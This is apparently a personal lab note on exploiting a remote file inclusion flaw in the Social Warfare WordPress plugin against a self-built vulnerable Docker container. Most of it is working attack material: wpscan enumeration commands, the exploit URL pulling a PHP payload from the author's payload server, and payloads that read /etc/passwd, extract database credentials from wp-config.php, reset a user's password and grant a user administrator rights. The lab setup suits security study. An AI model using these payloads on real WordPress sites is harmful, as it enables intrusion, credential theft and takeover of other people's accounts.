wordpress privilege escalation

--- tags: cybersecurity --- # wordpress privilege escalation use this vulnerable plugin https://wpvulndb.com/vulnerabilities/9259 read these articles https://www.cyberpunk.rs/wpscan-usage-example https://www.webarxsecurity.com/social-warfare-vulnerability/ tool https://github.com/wpscanteam/wpscan docker run -it --rm wpscanteam/wpscan --url http://127.0.0.1:80 --wp-content-dir /wp-content/ --enumerate vp --plugins-detection aggressive docker run -it --rm wpscanteam/wpscan --url http://127.0.0.1:80 --enumerate u build docker image with https://github.com/wpscanteam/VulnerableWordpress ``` cd ~/ git clone https://github.com/wpscanteam/VulnerableWordpress.git cd VulnerableWordpress docker build -t wordpress:vulnerable . ``` run docker a vulnerable wordpress container and a payload server ``` docker run -d -p 80:80 wordpress/vulnerable mkdir /root/payload echo "<pre>system('cat /etc/passwd')</pre>" > /root/payload/payload.txt docker run -p 81:80 -d -v /root/payload:/usr/share/nginx/html nginx ``` show ip address ``` ifconfig ens33 | grep inet -m1 inet 192.168.187.213 netmask 255.255.255.0 broadcast 192.168.187.255 ``` :::danger Bridge IP must be used when initializing WordPress at first time, otherwise it won't be access from outside network. ::: exploit ```! http://192.168.187.213/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.187.213:81/payload.txt ``` :::warning the host of`payload.txt` cannnot be 127.0.0.1 or loacalhost correct `http://192.168.187.213:81/payload.txt` incorrect `http://127.0.0.1:81/payload.txt` ::: ``` docker run --name payload -p 8088:80 -d -v /home/henryj/Desktop/payload:/usr/share/nginx/html nginx ``` change payload to see the mysql username and password ``` <pre>system('grep -i -E "db_user|db_password" /var/www/html/wp-config.php')</pre> ``` result ![](https://i.imgur.com/0nWnSOj.png) enumerate users ``` wpscan --url http://localhost --enumerate u ``` ![](https://i.imgur.com/w7TNSNc.png) update user password this payload ```! <pre>system('mysql -uwordpress -pwordpress -e "use wordpress; UPDATE wp_users SET user_pass = MD5(\"password\") WHERE user_login=\"user\";"')</pre> ``` break down payload to several parts ad-hoc exec part ``` <pre> phpinfo(); </pre> ``` ``` <pre>system('mysql -uwordpress -pwordpress -e " # here is sql statement "')</pre> ``` sql statement part ```sql= use wordpress; UPDATE wp_users SET user_pass = MD5(\"password\") WHERE user_login=\"user\"; ``` examples: ```! <pre>system('mysql -uwordpress -pwordpress -e "use wordpress; select * from wp_users where user_login=\"user1\"; select * from wp_usermeta where user_id=\"2\";"')</pre> <pre>system('mysql -uwordpress -pwordpress -e "use wordpress; select meta_value from wp_usermeta where meta_key=\'wp_user_level\' and user_id=\'2\';"')</pre> <pre>system('mysql -uwordpress -pwordpress -e "use wordpress; update wp_usermeta set meta_value = \'a:1:{s:13:\"administrator\";b:1;}\' where meta_key=\'wp_capabilities\' and user_id=\'2\';"')</pre> meta_value a:1:{s:13:"administrator";b:1;} <pre>system('mysql -uwordpress -pwordpress -e "use wordpress; update wp_usermeta set meta_value = \'10\' where meta_key=\'wp_user_level\' and user_id=\'2\';"')</pre> meta_value 10 ``` which code cause vulnerability is_admin only checks if the requested page is part of admin interface and won’t prevent any unauthorized visit.